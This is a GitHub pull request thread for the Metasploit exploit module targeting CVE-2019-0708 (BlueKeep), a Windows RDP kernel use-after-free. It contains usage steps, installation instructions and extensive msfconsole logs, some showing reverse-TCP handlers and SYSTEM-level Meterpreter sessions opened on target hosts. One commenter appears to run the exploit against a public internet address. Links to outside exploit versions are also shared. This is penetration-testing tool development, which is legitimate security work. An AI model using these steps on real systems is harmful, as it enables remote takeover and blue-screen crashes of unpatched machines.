Add initial exploit for CVE-2019-0708, BlueKeep

[bcook-r7]

This PR adds an exploit module for CVE-2019-0708, a.k.a. BlueKeep, exploiting a remote Windows kernel use-after-free vulnerability via RDP. The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution.

This module was originally developed by @zerosum0x0 and @ryhanson, then further moved along by @OJ, @zeroSteiner, @rickoates, @wvu-r7, @bwatters-r7, @wchen-r7, @tsellers-r7, @todb-r7 and others. The module was ported from a Python external module to a native Ruby module in order to take advantage of the RDP and other library enhancements in Metasploit. The original Python module is in the commit history if you wish to examine and compare it the the current implementation.

The module currently targets 64-bit versions of Windows 7 and Windows Server 2008 R2. For Windows Server 2008 R2, a registry entry needs to be modified to enable heap grooming via the RDPSND channel, though there remain other possibilities to explore for using alternate channels that are enabled by default on all Windows OSes.

The module is currently ranked as Manual, as the user needs to supply additional target information or risk crashing the target host. The module implements a default fingerprint-only TARGET option that just checks for a vulnerable host and displays some initial information about the specific target OS, but the user will need to specify a more exact target based on secondary recon, or until further improvements in this module enable more accurate determination of the target kernel memory layout at runtime.

There are specific targets for bare-metal, Virtualbox, VMware, and Hyper-V, though there may be additional variables in your target environment that additionally shift the base address for grooming, so we welcome any ideas from the community for automatically detecting this instead!

Todo

• Fix error handling when licensing is incorrect

Optional Todo

• Handle low-bandwidth networks more gracefully
• Add detection for whether RDPSND channel-based grooming will work
• Detect more OS specifics / obtain memory leak to determine Windows NPP start address
• Write the XP/2003 portions grooming MS_T120.
• Expand channels besides RDPSND/MS_T120 for grooming.

Verification

• Start msfconsole
• use exploit/rdp/cve_2019_0708_bluekeep_rce
• set RHOSTS to target hosts (x64 Windows 7 or 2008 R2)
• set PAYLOAD and associated options as desired
• set TARGET to a more specific target based on your environment
• Verify that you get a shell
• Verify the target does not crash

Exploitation Sample Output

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Exploiting target 192.168.56.101

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:3389   - Detected RDP on 192.168.56.101:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.101:3389   - The target is vulnerable.
[-] 192.168.56.101:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually
[*] Exploiting target 192.168.56.105
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.105:3389   - Detected RDP on 192.168.56.105:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.105:3389   - The target is vulnerable.
[-] 192.168.56.105:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
target => 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Exploiting target 192.168.56.101

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:3389   - Detected RDP on 192.168.56.101:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.101:3389   - The target is vulnerable.
[*] 192.168.56.101:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] 192.168.56.101:3389 - Surfing channels ...
[*] 192.168.56.101:3389 - Lobbing eggs ...
[*] 192.168.56.101:3389 - Forcing the USE of FREE'd object ...
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49159) at 2019-09-06 01:26:40 -0500
[*] Session 1 created in the background.
[*] Exploiting target 192.168.56.105
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.105:3389   - Detected RDP on 192.168.56.105:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.105:3389   - The target is vulnerable.
[*] 192.168.56.105:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] 192.168.56.105:3389 - Surfing channels ...
[*] 192.168.56.105:3389 - Lobbing eggs ...
[*] 192.168.56.105:3389 - Forcing the USE of FREE'd object ...
[*] Sending stage (206403 bytes) to 192.168.56.105
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.105:49158) at 2019-09-06 01:26:58 -0500
[*] Session 2 created in the background.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ BCOOK-PC         192.168.56.1:4444 -> 192.168.56.101:49159 (192.168.56.101)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN-VVEKS0PTPFB  192.168.56.1:4444 -> 192.168.56.105:49158 (192.168.56.105)

[bcoles]

To test, ensure you've copied all four .rb files from this PR, then restart msfconsole.

This PR includes changes to the core RDP library in Metasploit for this exploit. Make sure to download and edit all the files changed (https://github.com/rapid7/metasploit-framework/pull/12283/files)

• lib/msf/core/exploit/rdp.rb
• modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
• modules/auxiliary/scanner/rdp/rdp_scanner.rb
• modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

[bcoles]

I've tried this on Windows 2008 R2 Enterprise (x64) (2GB RAM) on VMware® Workstation 15 Player 15.1.0 build-13591040.

Exploit failed, but the host didn't crash either.

Edit: Looks like it failed at the license packet step. Which makes sense, as the service was configured with no license, within the 120 day license grace period.

• NLA disabled
• HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0.

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 3
target => 3
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > check

[*] 172.16.191.198:3389   - Verifying RDP protocol...
[*] 172.16.191.198:3389   - Attempting to connect using TLS security
[*] 172.16.191.198:3389   - Verifying RDP protocol...
[*] 172.16.191.198:3389   - Attempting to connect using TLS security
[*] 172.16.191.198:3389   - Detected RDP on 172.16.191.198:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[*] 172.16.191.198:3389   - Sending erect domain request
[*] 172.16.191.198:3389   - Sending client info PDU
[*] 172.16.191.198:3389   - Received License packet
[*] 172.16.191.198:3389   - Sending client confirm active PDU
[*] 172.16.191.198:3389   - Sending client synchronize PDU
[*] 172.16.191.198:3389   - Sending client control cooperate PDU
[*] 172.16.191.198:3389   - Sending client control request control PDU
[-] 172.16.191.198:3389   - Connection reset
[*] 172.16.191.198:3389   - Cannot reliably check exploitability.
[*] 172.16.191.198:3389 - Cannot reliably check exploitability.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 172.16.191.198:3389   - Verifying RDP protocol...
[*] 172.16.191.198:3389   - Attempting to connect using TLS security
[*] 172.16.191.198:3389   - Verifying RDP protocol...
[*] 172.16.191.198:3389   - Attempting to connect using TLS security
[*] 172.16.191.198:3389   - Detected RDP on 172.16.191.198:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[*] 172.16.191.198:3389   - Sending erect domain request
[*] 172.16.191.198:3389   - Sending client info PDU
[*] 172.16.191.198:3389   - Received License packet
[*] 172.16.191.198:3389   - Sending client confirm active PDU
[*] 172.16.191.198:3389   - Sending client synchronize PDU
[*] 172.16.191.198:3389   - Sending client control cooperate PDU
[*] 172.16.191.198:3389   - Sending client control request control PDU
[-] 172.16.191.198:3389   - Connection reset
[*] 172.16.191.198:3389   - Cannot reliably check exploitability.
[*] 172.16.191.198:3389 - Verifying RDP protocol...
[*] 172.16.191.198:3389 - Attempting to connect using TLS security
[*] 172.16.191.198:3389 - Sending erect domain request
[*] 172.16.191.198:3389 - Sending client info PDU
[*] 172.16.191.198:3389 - Received License packet
[*] 172.16.191.198:3389 - Sending client confirm active PDU
[*] 172.16.191.198:3389 - Sending client synchronize PDU
[*] 172.16.191.198:3389 - Sending client control cooperate PDU
[*] 172.16.191.198:3389 - Sending client control request control PDU
[-] 172.16.191.198:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > 

---

Windows 7 SP 1 Professional (x64) (4GB RAM) on VMware® Workstation 15 Player 15.1.0 build-13591040.

• set target 1 - fail. no shell. blue screen after repeated attempts.
• set target 3 - always blue screen (SYSTEM_SERVICE_EXCEPTION, termdd.sys PAGE_FAULT_IN_NONPAGED_AREA)

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target
target => 3
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)


msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > 
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > check

[*] 172.16.191.130:3389   - Verifying RDP protocol...
[*] 172.16.191.130:3389   - Attempting to connect using TLS security
[*] 172.16.191.130:3389   - Verifying RDP protocol...
[*] 172.16.191.130:3389   - Attempting to connect using TLS security
[*] 172.16.191.130:3389   - Detected RDP on 172.16.191.130:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[*] 172.16.191.130:3389   - Sending erect domain request
[*] 172.16.191.130:3389   - Sending client info PDU
[*] 172.16.191.130:3389   - Received License packet
[*] 172.16.191.130:3389   - Waiting for Server Demand packet
[*] 172.16.191.130:3389   - Received Server Demand packet
[*] 172.16.191.130:3389   - Sending client confirm active PDU
[*] 172.16.191.130:3389   - Sending client synchronize PDU
[*] 172.16.191.130:3389   - Sending client control cooperate PDU
[*] 172.16.191.130:3389   - Sending client control request control PDU
[*] 172.16.191.130:3389   - Sending client input sychronize PDU
[*] 172.16.191.130:3389   - Sending client font list PDU
[*] 172.16.191.130:3389   - Sending patch check payloads
[+] 172.16.191.130:3389   - The target is vulnerable.
[+] 172.16.191.130:3389 - The target is vulnerable.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 172.16.191.130:3389   - Verifying RDP protocol...
[*] 172.16.191.130:3389   - Attempting to connect using TLS security
[*] 172.16.191.130:3389   - Verifying RDP protocol...
[*] 172.16.191.130:3389   - Attempting to connect using TLS security
[*] 172.16.191.130:3389   - Detected RDP on 172.16.191.130:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[*] 172.16.191.130:3389   - Sending erect domain request
[*] 172.16.191.130:3389   - Sending client info PDU
[*] 172.16.191.130:3389   - Received License packet
[*] 172.16.191.130:3389   - Waiting for Server Demand packet
[*] 172.16.191.130:3389   - Received Server Demand packet
[*] 172.16.191.130:3389   - Sending client confirm active PDU
[*] 172.16.191.130:3389   - Sending client synchronize PDU
[*] 172.16.191.130:3389   - Sending client control cooperate PDU
[*] 172.16.191.130:3389   - Sending client control request control PDU
[*] 172.16.191.130:3389   - Sending client input sychronize PDU
[*] 172.16.191.130:3389   - Sending client font list PDU
[*] 172.16.191.130:3389   - Sending patch check payloads
[+] 172.16.191.130:3389   - The target is vulnerable.
[*] 172.16.191.130:3389 - Verifying RDP protocol...
[*] 172.16.191.130:3389 - Attempting to connect using TLS security
[*] 172.16.191.130:3389 - Sending erect domain request
[*] 172.16.191.130:3389 - Sending client info PDU
[*] 172.16.191.130:3389 - Received License packet
[*] 172.16.191.130:3389 - Waiting for Server Demand packet
[*] 172.16.191.130:3389 - Received Server Demand packet
[*] 172.16.191.130:3389 - Sending client confirm active PDU
[*] 172.16.191.130:3389 - Sending client synchronize PDU
[*] 172.16.191.130:3389 - Sending client control cooperate PDU
[*] 172.16.191.130:3389 - Sending client control request control PDU
[*] 172.16.191.130:3389 - Sending client input sychronize PDU
[*] 172.16.191.130:3389 - Sending client font list PDU
[*] 172.16.191.130:3389 - Handling SERVER ANNOUNCE ...
[*] 172.16.191.130:3389 - Handling SERVER CAPABILITY ...
[*] 172.16.191.130:3389 - Handling CLIENT ID CONFIRM ...
[*] 172.16.191.130:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 172.16.191.130:3389 - Creating free trigger for user 13 on channel 1013
[*] 172.16.191.130:3389 - Surfing channels ...
[*] 172.16.191.130:3389 - Lobbing eggs ...
[*] 172.16.191.130:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > 

[busterb]

Thanks @bcoles will take a look at the VMware target. We may be a bit over-broad in which VMWare product we're specifying there, though of course it would be nice to not need these specific targets at the risk of having a combinatorial target explosion.

[rockstardev]

Godspeed my friends... let's hope enough people patch their systems before pwning starts.

[ghost]

@bcoles the different targets mostly have to do with hot-swap memory. When it's enabled, the NT kernel must allocate more PFN table PTE metadata structures before the actual start of the NPP.

If hot-swap memory is disabled (nominal) I would expect the default target to work. A full kernel crash dump is required for analysis though, the minidumps don't carry enough info forward.

[Zn00k]

[*] Started reverse TCP handler on 192.168.146.128:4444 
[+] IP:3389  - The target is vulnerable.
[-] IP:3389 - Exploit failed: NameError undefined local variable or method rdp_connect for #<Msf::Modules::Exploit__Windows__Rdp__Cve_2019_0708_bluekeep_rce::MetasploitModule:0x00005585bce1ee60>
Did you mean?  disconnect
[*] Exploit completed, but no session was created.

[jiushill]

cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/

rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb 替换 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb 替换 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

[kevthehermit]

What is the easiest way to identify the Groombase for other targets - Looking at a Server 2008 R2 on AWS (Uploaded a vulnerable image that had been tested locally with VMware)

[MartinIngesen]

[*] Started reverse TCP handler on 192.168.146.128:4444 [+] IP:3389 - The target is vulnerable. [-] IP:3389 - Exploit failed: NameError undefined local variable or method rdp_connect' for #Msf::Modules::Exploit__Windows__Rdp__Cve_2019_0708_bluekeep_rce::MetasploitModule:0x00005585bce1ee60
Did you mean? disconnect
[*] Exploit completed, but no session was created.
`

There were changes made to the core rdp library in Metasploit for this exploit. Make sure to download and edit all the files changed (https://github.com/rapid7/metasploit-framework/pull/12283/files)

[DoktorCranium]

What is the version of VirtualBox this has been tested on? I keep getting BSODs on both vulnerable Win7 and Win2k8 (Running VirtualBox 6.0.12 r133076 on x86_64 Linux)

[] Started reverse TCP handler on 192.168.11.9:4444
[] 10.0.2.21:3389 - Detected RDP on 10.0.2.21:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 10.0.2.21:3389 - The target is vulnerable.
[] 10.0.2.21:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[] 10.0.2.21:3389 - Surfing channels ...
[] 10.0.2.21:3389 - Lobbing eggs ...
[] 10.0.2.21:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets

Exploit targets:

Id Name

---

0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

[jack-99]

为什么我更新了msf，也没有找到这个利用模块

[MartinIngesen]

i was successfully able to run this against Windows 7 Ultimate x64 (7601) SP1 using VMware® Workstation 15 Pro (15.1.0 build-13591040)

[jiushill]

为什么我更新了无国界医生，也没有找到这个利用模块

得自己导入4个rb

[ghost]

70周年前发毛？国内的看这里:http://blog.xkkhh.cn/archives/535

大佬有没有找个物理机试试，如果不修改注册表的话是不是就没法复现了。

[jack-99]

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /

rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后，发现每次攻击都会蓝屏

[jiushill]

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /
rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后，发现每次攻击都会蓝屏

2008 r2要改注册表，不然会GG,你康上面

[jack-99]

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /
rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后，发现每次攻击都会蓝屏

2008 r2要改注册表，不然会GG,你康上面

我打的是win7 sp1的

[jiushill]

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /
rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后，发现每次攻击都会蓝屏

2008 r2要改注册表，不然会GG,你康上面

我打的是win7 sp1的

黑人问号

[jack-99]

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /
rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后，发现每次攻击都会蓝屏

2008 r2要改注册表，不然会GG,你康上面

我打的是win7 sp1的

黑人问号

我攻击的目标是win7 啊，win7不也受影响么，但是每次攻击都会蓝屏

[jiushill]

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /
rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后，发现每次攻击都会蓝屏

2008 r2要改注册表，不然会GG,你康上面

我打的是win7 sp1的

黑人问号

我攻击的目标是win7 啊，win7不也受影响么，但是每次攻击都会蓝屏

我这边也有朋友有这个问题，好像是target的问题

[busterb]

i was successfully able to run this against Windows 7 Ultimate x64 (7601) SP1 using VMware® Workstation 15 Pro (15.1.0 build-13591040)

Thanks for the note @MartinIngesen I was able to reproduce @bcoles crash above with VMWare Fusion 11.

[busterb]

What is the version of VirtualBox this has been tested on? I keep getting BSODs on both vulnerable Win7 and Win2k8 (Running VirtualBox 6.0.12 r133076 on x86_64 Linux)

@DoktorCranium VirtualBox 6.0.10 on Linux and Mac.

[adeljck]

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

Name Current Setting Required Description

---

RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = random
RHOSTS yes The target address range or CIDR identifier
RPORT 3389 yes The target port (TCP)

Exploit target:

Id Name

---

0 Automatic targeting via fingerprinting

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 154.8.170.33
rhosts => 154.8.170.33
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[] Started reverse TCP handler on 192.168.1.3:4444
[] 154.8.170.33:3389 - Cannot reliably check exploitability.
[-] 154.8.170.33:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.

give some help

[busterb]

Landing this module now, further improvements will come in new PRs. Thanks everyone for testing and notes!

[cbwang505]

i have a windows version
https://bbs.pediy.com/thread-254636.htm
https://gitee.com/cbwang505/CVE-2019-0708-EXP-WIndows

[brandenjlynch]

I keep seeing this error: "Exploit failed: NameError uninitialized constant OpenSSL::SSL::TLS1_VERSION"

As far as I can tell all the code is up to date, just pulled it down via git. Any thoughts? OpenSSL should already be required, so..

[zeroSteiner]

@brandenjlynch I'd run into the same error. It was an issue with my environment, IIRC the OpenSSL gem hadn't installed correctly. I would suggest you verify your version of ruby is correct and then reinstall that gem. I believe it tries to compile from source so make sure you have the development headers available.

[brandenjlynch]

@zeroSteiner Thanks I'll try that!

[robertgov]

Has anyone succeeded with a physical machine? The vmware unpached win 7 worked with a little groomsize tweaqking but can't even get to a 'bluescreen' on my other laptop in a lab test.

[busterb]

Release Notes

This adds an exploit module for CVE-2019-0708, a.k.a. BlueKeep, exploiting a remote Windows kernel use-after-free vulnerability via RDP. The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution.

[terabytexr3]

When i try in Kali many problem, almost GROOMSIZE and Target.
But i try windows version its good. Its very easy.
https://youtu.be/SCsJ9Uq3POk

[qiushui-sir]

When I tested, I always had the following questions
[*] Started reverse TCP handler on 192.168.1.119:4444 [*] 192.168.1.120:3389 - Detected RDP on 192.168.1.120:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.1.120:3389 - The target is vulnerable. [*] 192.168.1.120:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1. [*] 192.168.1.120:3389 - Surfing channels ... [*] 192.168.1.120:3389 - Lobbing eggs ... [-] 192.168.1.120:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploit completed, but no session was created.
I set goals, target and RHOST
My steps are the same as others, and even I have re-installed the system and Vmware several times.
What's wrong with me? What's wrong with me?

[wvu]

Nothing is wrong with you.

[qiushui-sir]

你没事。

What should I do to restore success?
Thank you.

[qiushui-sir]

I just tried 2008 again, the same question.
[*] Started reverse TCP handler on 192.168.1.119:4444 [*] 192.168.1.122:3389 - Detected RDP on 192.168.1.122:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.1.122:3389 - The target is vulnerable. [*] 192.168.1.122:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1. [*] 192.168.1.122:3389 - Surfing channels ... [*] 192.168.1.122:3389 - Lobbing eggs ... [-] 192.168.1.122:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploit completed, but no session was created.

[wvu]

What target did you select?

[qiushui-sir]

您选择了什么目标？

I chose VMware, version 15.1.0.

[amagrupp]

Не знаю что было изменено, но в virtual box эксплойт отрабатывает, но не создаёт сессию, не выполняет exeс, ничего.

В чем дело ?

[amagrupp]

I don’t know what has been changed, but in the virtual box, the exploit works, but does not create a session, does not execute exec, nothing.

What's the matter ?

[wvu]

First of all, everyone needs to provide more details. Logs, screenshots, anything. Information about your setup. Version numbers. WinDbg sessions if you have to. The exploit's success is highly dependent on memory layout, specifically NPP base. It is impossible to provide support for this module without details. This is bug reporting 101.

Second of all, this is the pull request for the module, not a bug tracker. If you have bugs, please file them as issues. If you have support questions, ask on Slack, IRC, e-mail, or, if you're convinced GitHub is the place to be, ask via an issue. We will label it as question. This pull request is over.

Thank you.

[wvu]

Please read our CONTRIBUTING document. We would be happy to help everyone, just not here. Conversation on this PR is limited to development.

ETA: We've updated the document to clearly state where questions shouldn't go. Previously, it was stated where they should go and only implied where they shouldn't go. Thanks.